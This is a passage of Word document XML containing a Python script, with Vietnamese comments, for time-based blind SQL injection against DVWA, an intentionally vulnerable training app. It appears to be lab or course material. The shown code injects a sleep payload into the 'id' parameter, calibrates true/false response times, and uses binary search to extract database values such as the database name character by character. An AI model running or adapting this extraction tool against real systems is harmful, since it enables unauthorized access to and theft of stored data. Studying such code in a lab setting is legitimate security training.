    </w:p>
    <w:p w14:paraId="734640F2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    payload = INJECTION_TEMPLATE.format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69368577" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        condition=condition,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB0251" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        sleep=SLEEP_TIME,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A84C055" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D34DB9" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="5259B209" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    params = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560FD89D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        **BASE_PARAMS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F5D49B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        "id": payload,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA026B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BA0FB" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="090B9C6C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    start = time.perf_counter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C898B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="4DB556B6" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    if REQUEST_METHOD.upper() == "GET":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC6D51" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        response = session.get(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A9729" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            URL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D5FED3" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            params=params,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549DB31A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            timeout=TIMEOUT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ECCD1A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            allow_redirects=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5785446C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9EC53E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01A57B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        response = session.post(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06361DE1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            URL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6524EB12" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            data=params,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B036E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            timeout=TIMEOUT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F7066" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            allow_redirects=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A7BFEF" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B2D95" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="17908D6A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    elapsed = time.perf_counter() - start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DDEA5" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="20A33031" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    if "login.php" in response.url.lower():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C8FE2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        raise RuntimeError(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8A0E6" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            "Session DVWA hết hạn hoặc PHPSESSID sai. H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r>
        <w:t>y login lại v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> copy PHPSESSID mới."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5831828D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A43BE" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="4DB5DF23" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E1928" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="4A57EC65" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="2A14C8DE" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def median_time(condition: str, samples: int = 2) -&gt; float:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6AAEE2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    values = [timed_request(condition) for _ in range(samples)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C403D1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return statistics.median(values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD36289" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="0B77F40B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="13DA0E69" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def calibrate() -&gt; float:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F677F67" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F612B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Đ</w:t>
      </w:r>
      <w:r>
        <w:t>o thời gian false v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> true </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t>ể tự tạo ng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ỡng ph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>â</w:t>
      </w:r>
      <w:r>
        <w:t>n biệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F84CB" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E60EE1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print("[*] Calibrating timing...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD58AE1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="7E3DBBF7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    false_time = median_time("1=2", samples=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160F7F5" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    true_time = median_time("1=1", samples=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201523FC" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="661233F1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"    False response: {false_time:.2f}s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F83A2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    print(f"    True response : {true_time:.2f}s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249CAF2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="43FB91BC" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    if true_time - false_time &lt; SLEEP_TIME * 0.5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512C1C0" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        print("[!] Cảnh b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t>ộ lệch thời gian h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ơ</w:t>
      </w:r>
      <w:r>
        <w:t>i nhỏ. C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thể cần t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ă</w:t>
      </w:r>
      <w:r>
        <w:t>ng SLEEP_TIME l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ê</w:t>
      </w:r>
      <w:r>
        <w:t>n 3 hoặc 5.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F9E2B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="1583B309" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return false_time + ((true_time - false_time) / 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78782AD2" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="350FB03A" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="35E87750" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def is_true(condition: str) -&gt; bool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32361486" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE3810" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    Trả về True nếu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t>iều kiện SQL l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t>m server sleep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F79A06C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C0436" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    if threshold is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200A4F34" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        raise RuntimeError("Threshold ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc khởi tạo. H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r>
        <w:t>y chạy calibrate() tr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ớc.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D5196" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="367FBD36" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    elapsed = timed_request(condition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A92AA" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="282959A1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    # Nếu thời gian s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:t>t ng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ỡng th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ì</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o lại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t>ể giảm sai số</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55602F1B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    if abs(elapsed - threshold) &lt; 0.25:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FC12CC" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        elapsed = median_time(condition, samples=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1269FCD8" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="0715B10E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return elapsed &gt; threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66361D9B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="451AB400" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="2C784509" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD265D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># EXTRACTION LOGIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B58B30" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t># =========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA97C43" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="1A110FA7" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def extract_int(sql_number_expr: str, low: int = 0, high: int = 128) -&gt; int:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B923025" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524DB0F0" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    Binary search số nguy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ê</w:t>
      </w:r>
      <w:r>
        <w:t>n.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0989DB8E" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B88D70" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    sql_number_expr = "LENGTH((SELECT DATABASE()))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B16B3AB" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F76085" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    lo = low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3E8709" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    hi = high</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF515D" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="1671489C" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    while lo &lt; hi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB4AD6" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        mid = (lo + hi) // 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D72B621" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="44C1E748" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        condition = f"({sql_number_expr}) &gt; {mid}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD28015" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="6F88980B" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        if is_true(condition):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663DC5D8" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            lo = mid + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBE661" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121FB32" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">            hi = mid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE6CA0" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="418A308F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    return lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D75B025" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="56F35F3F" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B"/>
    <w:p w14:paraId="5199CBA1" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t>def extract_string(select_sql: str, max_len: int = 64) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1425ADDE" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BD0FA" w14:textId="77777777" w:rsidR="00EB1F1B" w:rsidRDefault="00EB1F1B" w:rsidP="00EB1F1B">
      <w:r>
        <w:t xml:space="preserve">    Extract từng k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ý</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tự từ một SELECT trả về 1 chuỗi.</w:t>
      </w:r>
    </w:p>
